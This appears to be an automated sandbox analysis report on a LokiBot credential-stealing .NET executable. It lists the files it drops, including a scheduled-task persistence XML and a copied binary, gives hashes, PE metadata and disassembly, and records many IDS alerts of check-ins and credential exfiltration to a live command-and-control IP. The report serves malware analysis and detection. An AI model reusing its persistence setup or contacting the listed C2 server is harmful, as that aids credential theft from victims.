                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\Desktop\YvVDV4cbjy.exe
                            File Type:XML 1.0 document, ASCII text
                            Category:dropped
                            Size (bytes):1581
                            Entropy (8bit):5.106948002890861
                            Encrypted:false
                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtGLxvn:cgergYrFdOFzOzN33ODOiDdKrsuTEv
                            MD5:E74C2F78CBF4B8E69E5534C9D65F6556
                            SHA1:9838367431A9460D1705F1AA14C37FE9B753F6EA
                            SHA-256:AE7D52D79686E3FCBF790FDCD72E6D4CD12436C36A6C93276BF8B9B8EA10B974
                            SHA-512:6336F7F3C961B8E0922665C0C587606B72B75BEB8F06F4993B5B145A287FFB703E49E1B55F85259237EC36AB71B1B504B2F2A701A7D2829CF41D3E961CF82145
                            Malicious:true
                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                            Process:C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
                            File Type:XML 1.0 document, ASCII text
                            Category:dropped
                            Size (bytes):1581
                            Entropy (8bit):5.106948002890861
                            Encrypted:false
                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtGLxvn:cgergYrFdOFzOzN33ODOiDdKrsuTEv
                            MD5:E74C2F78CBF4B8E69E5534C9D65F6556
                            SHA1:9838367431A9460D1705F1AA14C37FE9B753F6EA
                            SHA-256:AE7D52D79686E3FCBF790FDCD72E6D4CD12436C36A6C93276BF8B9B8EA10B974
                            SHA-512:6336F7F3C961B8E0922665C0C587606B72B75BEB8F06F4993B5B145A287FFB703E49E1B55F85259237EC36AB71B1B504B2F2A701A7D2829CF41D3E961CF82145
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                            Process:C:\Users\user\Desktop\YvVDV4cbjy.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Users\user\Desktop\YvVDV4cbjy.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):539648
                            Entropy (8bit):7.694874785384039
                            Encrypted:false
                            SSDEEP:12288:gPGqp9ou9WbaMbHkBsy6oaQRCfWksQVJZaoIsfMD:aroIWBrkPXcLXaoZMD
                            MD5:DE71DA3A473F5CDB285D30A1D6DD333B
                            SHA1:EBB3E9E7FE88C5BA0C24D0411F7A0C04C9E04181
                            SHA-256:EE0558D98D1151D6CE6EBB419A05E6DEF3C758F703518648A03C03ED8D830726
                            SHA-512:56ABC310955D04AB212C8737C6B1C2EF744F4C0D623FB7E12F4FCB4C8A5D03B9C80D96F225CC022A6ABC09F2EA68700E3EBFBA0B281E52A0E71996C06FA62D8D
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 79%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....aRg..............0..$..........FB... ...`....@.. ....................................@..................................A..O....`............................................................................... ............... ..H............text...l"... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............:..............@..B................(B......H.......L8..x!...........Y..0...........................................&.(......*...0.............X.+..*....0.............Y.+..*....0.............Z.+..*....0............"........,."...?....[.+..*.0..(.................,...+....Y(.......Y(....X.+..*.0..!........~.........,.s.........~.....+..*....0..R........r...p..r...p(....t......rc..po.......o......rm..po.....s.......o......+-..(.........(....r...p..(....r...p(....o....&..( ...-...........o!.....("....o#...o$.......ijo%....
                            Process:C:\Users\user\Desktop\YvVDV4cbjy.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:true
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Users\user\Desktop\YvVDV4cbjy.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):47
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:0D7DB7FF842F89A36B58FA2541DE2A6C
                            SHA1:50F3B486F99FB22648D26870E7A5CBA01CAED3DA
                            SHA-256:140EDA45FE001C0FE47EDD7FC509FF1882D46FBCB7C7437D893C1FB83012E433
                            SHA-512:6E6570A7CC802760730DB659A4EDE4221AC2CD944F4B0D97B0A5C8A9F2A072899E3C3FC5DAC336B53F8ACCDE81CBEECA6C5998A1471A2F91EB60E3E13620368D
                            Malicious:false
                            Preview:...............................................
                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):7.694874785384039
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            • Win32 Executable (generic) a (10002005/4) 49.75%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Windows Screen Saver (13104/52) 0.07%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            File name:YvVDV4cbjy.exe
                            File size:539'648 bytes
                            MD5:de71da3a473f5cdb285d30a1d6dd333b
                            SHA1:ebb3e9e7fe88c5ba0c24d0411f7a0c04c9e04181
                            SHA256:ee0558d98d1151d6ce6ebb419a05e6def3c758f703518648a03c03ed8d830726
                            SHA512:56abc310955d04ab212c8737c6b1c2ef744f4c0d623fb7e12f4fcb4c8a5d03b9c80d96f225cc022a6abc09f2ea68700e3ebfba0b281e52a0e71996c06fa62d8d
                            SSDEEP:12288:gPGqp9ou9WbaMbHkBsy6oaQRCfWksQVJZaoIsfMD:aroIWBrkPXcLXaoZMD
                            TLSH:21B401AC6A42D907CA4057781F71F2742FBC1EEEA901D2139FDD7DEB782AD159C88182
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....aRg..............0..$..........FB... ...`....@.. ....................................@................................
                            Icon Hash:04852062591b5659
                            Entrypoint:0x484246
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x675261CB [Fri Dec 6 02:30:35 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                            Instruction
                            jmp dword ptr [00402000h]
                            push ebx
                            add byte ptr [ecx+00h], bh
                            jnc 00007F7750CABA22h
                            je 00007F7750CABA22h
                            add byte ptr [ebp+00h], ch
                            add byte ptr [ecx+00h], al
                            arpl word ptr [eax], ax
                            je 00007F7750CABA22h
                            imul eax, dword ptr [eax], 00610076h
                            je 00007F7750CABA22h
                            outsd
                            add byte ptr [edx+00h], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x841f40x4f.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x860000x13bc.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000x8226c0x824001d758280f4c0402c70993577f9603791False0.9117982245681382data7.7039906967982645IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0x860000x13bc0x1400e02ab278456f74df5d4c01808b78c926False0.732421875data6.944434502409531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x880000xc0x200de86a6051ebb9d7bbe27e8424151498aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0x861000xd91PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8692772818888569
                            RT_GROUP_ICON0x86ea40x14data1.05
                            RT_VERSION0x86ec80x2f4data0.43253968253968256
                            RT_MANIFEST0x871cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                            DLLImport
                            mscoree.dll_CorExeMain
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2025-01-11T07:44:25.599550+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54970794.156.177.4180TCP
                            2025-01-11T07:44:25.599550+01002025381ET MALWARE LokiBot Checkin1192.168.2.54970794.156.177.4180TCP
                            2025-01-11T07:44:25.599550+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54970794.156.177.4180TCP
                            2025-01-11T07:44:26.317949+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.54970794.156.177.4180TCP
                            2025-01-11T07:44:26.514901+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54970894.156.177.4180TCP
                            2025-01-11T07:44:26.514901+01002025381ET MALWARE LokiBot Checkin1192.168.2.54970894.156.177.4180TCP
                            2025-01-11T07:44:26.514901+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54970894.156.177.4180TCP
                            2025-01-11T07:44:27.217417+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.54970894.156.177.4180TCP
                            2025-01-11T07:44:27.307244+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54970994.156.177.4180TCP
                            2025-01-11T07:44:27.307244+01002025381ET MALWARE LokiBot Checkin1192.168.2.54970994.156.177.4180TCP
                            2025-01-11T07:44:27.307244+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54970994.156.177.4180TCP
                            2025-01-11T07:44:28.030760+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54970994.156.177.4180TCP
                            2025-01-11T07:44:28.030760+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54970994.156.177.4180TCP
                            2025-01-11T07:44:28.191011+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971194.156.177.4180TCP
                            2025-01-11T07:44:28.191011+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971194.156.177.4180TCP
                            2025-01-11T07:44:28.191011+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971194.156.177.4180TCP
                            2025-01-11T07:44:28.931958+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971194.156.177.4180TCP
                            2025-01-11T07:44:28.931958+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54971194.156.177.4180TCP
                            2025-01-11T07:44:29.096261+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971394.156.177.4180TCP
                            2025-01-11T07:44:29.096261+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971394.156.177.4180TCP
                            2025-01-11T07:44:29.096261+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971394.156.177.4180TCP
                            2025-01-11T07:44:29.967134+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971394.156.177.4180TCP
                            2025-01-11T07:44:29.967134+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54971394.156.177.4180TCP
                            2025-01-11T07:44:30.130805+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971494.156.177.4180TCP
                            2025-01-11T07:44:30.130805+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971494.156.177.4180TCP
                            2025-01-11T07:44:30.130805+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971494.156.177.4180TCP
                            2025-01-11T07:44:30.851513+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971494.156.177.4180TCP
                            2025-01-11T07:44:30.851513+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54971494.156.177.4180TCP
                            2025-01-11T07:44:31.013403+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971594.156.177.4180TCP
                            2025-01-11T07:44:31.013403+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971594.156.177.4180TCP
                            2025-01-11T07:44:31.013403+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971594.156.177.4180TCP
                            2025-01-11T07:44:31.718507+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971594.156.177.4180TCP
                            2025-01-11T07:44:31.718507+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54971594.156.177.4180TCP
                            2025-01-11T07:44:32.794115+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971694.156.177.4180TCP
                            2025-01-11T07:44:32.794115+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971694.156.177.4180TCP
                            2025-01-11T07:44:32.794115+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971694.156.177.4180TCP
                            2025-01-11T07:44:33.640345+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971694.156.177.4180TCP
                            2025-01-11T07:44:33.640345+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54971694.156.177.4180TCP
                            2025-01-11T07:44:33.799410+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971794.156.177.4180TCP
                            2025-01-11T07:44:33.799410+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971794.156.177.4180TCP
                            2025-01-11T07:44:33.799410+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971794.156.177.4180TCP
                            2025-01-11T07:44:34.512627+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971794.156.177.4180TCP
                            2025-01-11T07:44:34.512627+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54971794.156.177.4180TCP
                            2025-01-11T07:44:34.671202+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971894.156.177.4180TCP
                            2025-01-11T07:44:34.671202+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971894.156.177.4180TCP
                            2025-01-11T07:44:34.671202+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971894.156.177.4180TCP
                            2025-01-11T07:44:35.396140+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971894.156.177.4180TCP
                            2025-01-11T07:44:35.396140+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54971894.156.177.4180TCP
                            2025-01-11T07:44:35.543288+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971994.156.177.4180TCP
                            2025-01-11T07:44:35.543288+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971994.156.177.4180TCP
                            2025-01-11T07:44:35.543288+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971994.156.177.4180TCP
                            2025-01-11T07:44:36.266782+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971994.156.177.4180TCP
                            2025-01-11T07:44:36.266782+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54971994.156.177.4180TCP
                            2025-01-11T07:44:36.441284+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54972094.156.177.4180TCP
                            2025-01-11T07:44:36.441284+01002025381ET MALWARE LokiBot Checkin1192.168.2.54972094.156.177.4180TCP
                            2025-01-11T07:44:36.441284+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54972094.156.177.4180TCP
                            2025-01-11T07:44:37.189451+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54972094.156.177.4180TCP
                            2025-01-11T07:44:37.189451+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54972094.156.177.4180TCP
                            2025-01-11T07:44:37.566875+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54972194.156.177.4180TCP
                            2025-01-11T07:44:37.566875+01002025381ET MALWARE LokiBot Checkin1192.168.2.54972194.156.177.4180TCP
                            2025-01-11T07:44:37.566875+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54972194.156.177.4180TCP
                            2025-01-11T07:44:38.297474+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54972194.156.177.4180TCP
                            2025-01-11T07:44:38.297474+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54972194.156.177.4180TCP
                            2025-01-11T07:44:38.454563+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54972294.156.177.4180TCP
                            2025-01-11T07:44:38.454563+01002025381ET MALWARE LokiBot Checkin1192.168.2.54972294.156.177.4180TCP
                            2025-01-11T07:44:38.454563+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54972294.156.177.4180TCP
                            2025-01-11T07:44:39.175539+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54972294.156.177.4180TCP
                            2025-01-11T07:44:39.175539+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54972294.156.177.4180TCP
                            2025-01-11T07:44:39.345173+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54972494.156.177.4180TCP
                            2025-01-11T07:44:39.345173+01002025381ET MALWARE LokiBot Checkin1192.168.2.54972494.156.177.4180TCP
                            2025-01-11T07:44:39.345173+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54972494.156.177.4180TCP
                            2025-01-11T07:44:40.083235+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54972494.156.177.4180TCP
                            2025-01-11T07:44:40.083235+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54972494.156.177.4180TCP
                            2025-01-11T07:44:40.457078+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54972594.156.177.4180TCP
                            2025-01-11T07:44:40.457078+01002025381ET MALWARE LokiBot Checkin1192.168.2.54972594.156.177.4180TCP
                            2025-01-11T07:44:40.457078+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54972594.156.177.4180TCP
                            2025-01-11T07:44:41.166479+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54972594.156.177.4180TCP
                            2025-01-11T07:44:41.166479+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54972594.156.177.4180TCP
                            2025-01-11T07:44:41.331671+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54973094.156.177.4180TCP
                            2025-01-11T07:44:41.331671+01002025381ET MALWARE LokiBot Checkin1192.168.2.54973094.156.177.4180TCP
                            2025-01-11T07:44:41.331671+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54973094.156.177.4180TCP
                            2025-01-11T07:44:42.037120+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54973094.156.177.4180TCP
                            2025-01-11T07:44:42.037120+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54973094.156.177.4180TCP
                            2025-01-11T07:44:42.253637+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54973894.156.177.4180TCP
                            2025-01-11T07:44:42.253637+01002025381ET MALWARE LokiBot Checkin1192.168.2.54973894.156.177.4180TCP
                            2025-01-11T07:44:42.253637+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54973894.156.177.4180TCP
                            2025-01-11T07:44:42.934004+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54973894.156.177.4180TCP
                            2025-01-11T07:44:42.934004+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54973894.156.177.4180TCP
                            2025-01-11T07:44:43.098513+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54974394.156.177.4180TCP
                            2025-01-11T07:44:43.098513+01002025381ET MALWARE LokiBot Checkin1192.168.2.54974394.156.177.4180TCP
                            2025-01-11T07:44:43.098513+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54974394.156.177.4180TCP
                            2025-01-11T07:44:43.818626+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54974394.156.177.4180TCP
                            2025-01-11T07:44:43.818626+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54974394.156.177.4180TCP
                            2025-01-11T07:44:43.980050+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54974994.156.177.4180TCP
                            2025-01-11T07:44:43.980050+01002025381ET MALWARE LokiBot Checkin1192.168.2.54974994.156.177.4180TCP
                            2025-01-11T07:44:43.980050+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54974994.156.177.4180TCP
                            2025-01-11T07:44:44.687247+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54974994.156.177.4180TCP
                            2025-01-11T07:44:44.687247+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54974994.156.177.4180TCP
                            2025-01-11T07:44:44.852549+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54975594.156.177.4180TCP
                            2025-01-11T07:44:44.852549+01002025381ET MALWARE LokiBot Checkin1192.168.2.54975594.156.177.4180TCP
                            2025-01-11T07:44:44.852549+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54975594.156.177.4180TCP
                            2025-01-11T07:44:45.559460+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54975594.156.177.4180TCP
                            2025-01-11T07:44:45.559460+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54975594.156.177.4180TCP
                            2025-01-11T07:44:45.728633+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54976194.156.177.4180TCP
                            2025-01-11T07:44:45.728633+01002025381ET MALWARE LokiBot Checkin1192.168.2.54976194.156.177.4180TCP
                            2025-01-11T07:44:45.728633+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54976194.156.177.4180TCP
                            2025-01-11T07:44:46.454393+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54976194.156.177.4180TCP
                            2025-01-11T07:44:46.454393+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54976194.156.177.4180TCP
                            2025-01-11T07:44:46.611946+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54977194.156.177.4180TCP
                            2025-01-11T07:44:46.611946+01002025381ET MALWARE LokiBot Checkin1192.168.2.54977194.156.177.4180TCP
                            2025-01-11T07:44:46.611946+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54977194.156.177.4180TCP
                            2025-01-11T07:44:47.315113+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54977194.156.177.4180TCP
                            2025-01-11T07:44:47.315113+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54977194.156.177.4180TCP
